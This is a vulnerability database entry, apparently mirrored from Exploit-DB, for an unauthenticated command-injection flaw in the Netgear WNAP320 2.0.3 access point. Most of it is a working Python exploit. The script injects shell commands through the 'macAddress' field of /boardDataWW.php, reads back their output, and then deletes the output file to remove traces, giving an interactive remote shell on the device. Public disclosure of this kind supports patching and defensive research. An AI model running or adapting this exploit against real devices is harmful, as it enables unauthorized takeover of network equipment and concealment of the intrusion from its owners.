ID
VAR-E-202106-0127
EDB ID
50069
TITLE
Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated) - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated). webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | netgear | model: | wnap320 | scope: | eq | version: | 2.0.3 | Trust: 1.6 |
EXPLOIT
# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
# Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# IoT Device: Netgear WNAP320 Access Point
# Version: WNAP320 Access Point Firmware v2.0.3
import requests
import sys
if(len(sys.argv) != 2):
    print('Must specify the IP parameter')
    print("eg: python3 wnap320_v2_0_3.py <IP>")
    sys.exit(0)
host = sys.argv[1]
port = 80
cmd = ''
while(True):
    cmd = input('Shell_CMD$ ')
    #injecting system command part writing the command output to a output file
    data = {
        'macAddress' : '112233445566;' + cmd + ' > ./output #',
        'reginfo' : '0',
        'writeData' : 'Submit'
    }
    url = 'http://' + host + '/boardDataWW.php'
    response = requests.post(url, data=data)
    if(response.ok):
        #read the command output result
        url = 'http://' + host + '/output'
        cmdOutput = requests.get(url)
        print(cmdOutput.text)
        #remove trace
        cmd = 'rm ./output'
        data = {
            'macAddress' : '112233445566;' + cmd + ' #',
            'reginfo' : '0',
            'writeData' : 'Submit'
        }
        url = 'http://' + host + '/boardDataWW.php'
        response = requests.post(url, data=data)
    else:
        print('[!] No response from the server.')
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'macAddress' Remote Code Execution (RCE) (Unauthenticated)
Trust: 1.6
CREDITS
Bryan Leong
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 50069 | Trust: 1.6 |
db: | EDBNET | id: | 104520 | Trust: 0.6 |
REFERENCES
url: | https://www.exploit-db.com/exploits/50069/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 50069 |
db: | EDBNET | id: | 104520 |
LAST UPDATE DATE
2022-07-27T09:49:05.455000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 50069 | date: | 2021-06-28T00:00:00 |
db: | EDBNET | id: | 104520 | date: | 2021-06-28T00:00:00 |